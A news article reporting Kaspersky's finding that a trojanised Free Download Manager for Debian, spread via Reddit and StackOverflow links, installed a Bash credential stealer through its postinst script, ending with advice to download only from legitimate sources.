An infostealing malware campaign has been underway for at least three years, going completely unnoticed, Russian cybersecurity firm Kaspersky has revealed.
The finding came after the company decided to take a closer look at the growing number of Linux-based attacks, which “can operate for years without being noticed by the cybersecurity community.”
This example in particular focuses on what appears to be a free download manager destined for use on Debian machines, which has been available in its malicious form since January 2020.
Debian download manager malware
Affected versions of the downloadable software contain an infected postinst script that is executed upon installation, which the analysts say contains comments in both Russian and Ukrainian.
Having downloaded and installed an infected version of the software for further investigation, Kaspersky’s workers reveal that a Bash stealer is deployed to collect information such as system information, browsing history, saved passwords, cryptocurrency wallet files, and credentials for cloud services - specifically, AWS, Google Cloud, Oracle Cloud Infrastructure, Azure.
Fortunately, the researchers also revealed how the malicious version of the software had been distributed. They confirmed that the official website and its content had not been compromised, and actually, the infostealing version had been posted to online communities like Reddit and StackOverflow over a period of around two years.
The genuine makers of Free Download Manager have since been notified by Kaspersky, though at the time of writing, they had not responded.
According to Kaspersky, the threat actor targeted Linux machines specifically because they are much less frequently analyzed compared with Windows and macOS devices, simply due to popularity reasons.
Still, there are some very easy steps that users can take to protect themselves online. Most importantly, users should only download from legitimate sources and check things like domains and email addresses against what has been verified as legitimate. Doing so would have saved victims from this case of malware.